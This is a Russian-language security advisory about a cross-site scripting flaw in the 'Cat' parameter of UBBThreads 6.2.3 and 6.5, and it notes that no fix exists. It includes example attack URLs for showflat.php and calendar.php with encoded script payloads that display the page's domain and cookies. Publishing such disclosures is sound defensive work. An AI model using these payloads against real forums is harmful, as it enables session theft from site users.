Межсайтовое выполнение сценариев в UBBThreads
| Дата публикации: | 17.12.2004 |
| Дата изменения: | 17.10.2006 |
| Всего просмотров: | 1343 |
| Опасность: | Низкая |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: UBBThreads 6.2.3, 6.5
Описание: Уязвимость существует из-за некорректной фильтрации данных в параметре ‘Cat’. Удаленный атакующий может с помощью специально сформированного URL выполнить произвольный HTML код в браузере целевого пользователя. Примеры: [forum]/showflat.php?Cat=document.write(unescape("%3CSCRIPT%3Ealert%28document.domain%29%3B%3C/SCRIPT%3E %3CSCRIPT%3Ealert%28document.cookie%29%3B%3C/SC [forum]/calendar.php?Cat=document.write(unescape("%3CSCRIPT%3Ealert%28document.domain%29%3B%3C/SCRIPT%3E%3CSCRIPT%3Eale rt%28document.cookie%29%3B%3C/SC [forum]/login.php?Cat=[XSS(s.a.)] [forum]/online.php?Cat=[XSS(s.a.)] URL производителя: www.ubbcentral.com/ubbthreads/ Решение: Решение не существует на данный момент. |
|
| Ссылки: | UBBThreads Input Validation Hole in 'Cat' Parameter Lets Remote Users Conduct Cross-Site Scripting Attacks |